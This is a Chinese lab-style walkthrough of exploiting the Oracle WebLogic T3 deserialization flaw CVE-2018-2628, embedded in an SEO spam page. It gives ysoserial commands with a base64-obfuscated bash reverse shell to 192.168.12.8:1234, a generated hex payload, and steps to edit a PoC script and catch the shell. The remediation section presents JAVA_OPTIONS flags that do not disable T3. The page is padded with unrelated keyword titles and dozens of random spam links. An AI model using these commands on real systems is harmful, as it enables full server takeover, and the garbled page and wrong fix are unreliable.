当前位置: 首页 > wzjs >正文

网站开发支付功能西安学校网站建设哪家好

网站开发支付功能,西安学校网站建设哪家好,辽宁住房建设厅网站首页,中国机械加工网制造介绍: 是一个影响 Oracle WebLogic Server 的严重漏洞,属于 远程代码执行(RCE) 漏洞。以下是对该漏洞的详细分析: ● 漏洞类型: 远程代码执行(RCE) ● 影响范围:Oracle WebLogic Server 10.3.6.0, 12.1.3.0, 12.2.1.2…

介绍:

是一个影响 Oracle WebLogic Server 的严重漏洞,属于 远程代码执行(RCE) 漏洞。以下是对该漏洞的详细分析:
● 漏洞类型: 远程代码执行(RCE)
● 影响范围:Oracle WebLogic Server 10.3.6.0, 12.1.3.0, 12.2.1.2, 12.2.1.3
● 漏洞等级:严重(CVSS 评分:9.8)

CVSS(Common Vulnerability Scoring
System,通用漏洞评分系统)是一种用于评估计算机系统漏洞严重程度的标准化评分体系。它通过量化指标对漏洞的威胁等级进行评分(0-10分),分数越高代表风险越高。

● 漏洞原理:攻击者可以通过 T3 协议发送恶意序列化数据,触发反序列化漏洞,从而在目标服务器上执行任何代码

T3协议是Oracle WebLogic
Server中用于分布式应用通信的专有协议,主要用于服务器与客户端、集群节点间的数据传输,尤其支持Java对象序列化传输。

● 漏洞影响:

  1. 远程代码执行
    ○ 攻击者可以在目标服务器上执行任意命令,完全控制服务器
  2. 数据泄露
    ○ 攻击者可以读取服务器上的敏感数据
  3. 服务器被接管
    ○ 攻击者可以植入后门、创建新用户或删除数据
    ● 漏洞利用:
工具地址:
https://github.com/Lighird/CVE-2018-2628     #在官方的文档中找到了需要使用的工具!
根据文档内容操作

在这里插入图片描述

直接使用ysoserial-0.1-cve-2018-2628-all.jar生成payload目的是将漏洞服务器和JRMP服务器建立连接
启动JRMP服务,目的是为了让weblogic服务器远程调用

连接jrmp服务poc

java -cp ysoserial-0.1-cve-2018-2628-all.jar ysoserial.exploit.JRMPListener  1234 Jdk7u21 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyLjgvMTIzNCAwPiYx}|{base64,-d}|{bash,-i}"  #使用ysoserial来启动jrmp服务,监听1234端口 java环境大于11使用jdk7u21  bash -c 使用反弹shell 只需要kali监听即可

利用ysoserial-0.1-cve-2018-2628-all.jar生成payload

java -jar ysoserial-0.1-cve-2018-2628-all.jar JRMPClient2 192.168.12.8:1234 | xxd -p | tr -d $'\n' && echo

生成的payload

aced0005737d00000001001d6a6176612e726d692e61637469766174696f6e2e416374697661746f72787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707735000a556e6963617374526566000c3139322e3136382e31322e38000004d2fffffffff663bec100000000000000000000000000000078

打开漏洞利用工具目录下的 weblogic_poc.py 文件
修改两处
第一处将复制的payload替换原有的payload
在这里插入图片描述

第二处修改漏洞服务器的IP地址和端口
在这里插入图片描述
(这里介绍一下,ip地址为上述的12.8 也就是反弹的地址,端口号也一样)

kali 建立监听监听 1234 端口等待上线即可! ● 修复建议: ○ 官方补丁:
■ 升级到以下或者更高版本
● 10.3.6.0.180417
● 12.1.3.0.180417
● 12.2.1.3.180417 ○ 限制 T3 协议访问:
■ 使用防火墙安全着限制对 weblogic server T3 端口(默认 7001)的访问
■ 修改 weblogic server 配置,禁用 T3 协议

set WL_HOME=/path/to/weblogic
$WL_HOME/server/bin/setDomainEnv.sh
export JAVA_OPTIONS="-Dweblogic.security.allowCryptoJDefaultVerification=true -Dweblogic.security.SSL.ignoreHostnameVerification=true -Dweblogic.security.allowCryptoJDefaultPRNG=true -Dweblogic.security.allowCryptoJDefaultJCEVerification=true"
■ 监控日志 ● 检查 weblogc server 日志,发现可疑的 T3 请求

● 漏洞检测:
○ 手动检测:
■ 检查 weblogic server 版本是否在影响范围内
■ 使用漏洞扫描工具检测
■ 使用公开的 poc 脚本验证

总结

在联系过程中要去细致的掌握每一个知识点,多多重复,才有效果!


文章转载自:

http://fIlzoP4A.jzgxp.cn
http://Ol0HMPJc.jzgxp.cn
http://cktqDFxq.jzgxp.cn
http://uI4k0piP.jzgxp.cn
http://CGg6i37I.jzgxp.cn
http://UxRpq2Fw.jzgxp.cn
http://9e3jr4V1.jzgxp.cn
http://WRIuji0J.jzgxp.cn
http://CS9sUNcZ.jzgxp.cn
http://b5hWLXZb.jzgxp.cn
http://RTnFjTaJ.jzgxp.cn
http://UbmQfHRp.jzgxp.cn
http://wWmxvT3I.jzgxp.cn
http://q7nioXmK.jzgxp.cn
http://TGWrTPzA.jzgxp.cn
http://LX5q11hY.jzgxp.cn
http://2PJ83oYa.jzgxp.cn
http://Yjy03zbb.jzgxp.cn
http://jFOTpmsh.jzgxp.cn
http://2iZiDEwC.jzgxp.cn
http://tTkgQQhw.jzgxp.cn
http://Mu85mVmf.jzgxp.cn
http://jZghxP6l.jzgxp.cn
http://INs5iAfX.jzgxp.cn
http://aYz2qCY7.jzgxp.cn
http://b4y8F53i.jzgxp.cn
http://EoUzh25F.jzgxp.cn
http://xRn0vk7f.jzgxp.cn
http://ge48fbZj.jzgxp.cn
http://XA4uOAod.jzgxp.cn
http://www.dtcms.com/wzjs/691365.html

相关文章:

  • 网站建设费用用网站 团队
  • 百度 网站 说明wordpress在线预览pdf
  • 刷题网站开发网站策划书撰写流程
  • 盐城做网站spider net最新源码
  • 海口模板建站定制网站wordpress 插件破解
  • 网站制作网站建设项目规划书怎么做网站栏目
  • 网站建设和网站设计一样吗网站建设服务器选择
  • 网站开发三层网站外链数怎么查
  • 公司网站上线的通知中国平安保险公司官网首页
  • 做网站建设公司赚钱吗网站建设管理制度
  • 黄骅港教育网站如何做seo
  • 做网站用哪个版本的eclipse集团网站制作
  • 合肥营销网站建设联系方式网站收录提交入口官网
  • wordpress扫描附件到新浪图床为企业做网站建设优化小程序包年竞价
  • 织梦网站wap网站建设项目合同
  • 网站的域名空间个人网站如何提高访问量
  • 邢台123信息网汽车seo是什么意思
  • 重庆网站seo方法企业查询网页版
  • wordpress安全整站优化加盟
  • 长沙城乡建设网站首页wordpress的网站
  • 网页美工设计网站wordpress会员认证
  • 做企业网站 需要注意的微小店
  • 国家精品课程建设工作网站四川建设工程网
  • 做网站挣钱的人有哪些好的响应式网站有哪些
  • cn域名建设网站需要备案吗旅游网站建设要如何做
  • 网站登陆界面怎么做商场大型话题活动策划网站
  • 浙江网站建设广告语做网站好一点的公司
  • 网站企业备案和个人备案的区别h5页面制作结论和心得
  • 做网站一般用什么配置的电脑什么是推广
  • 宜春做网站国家关于网站信息建设管理文件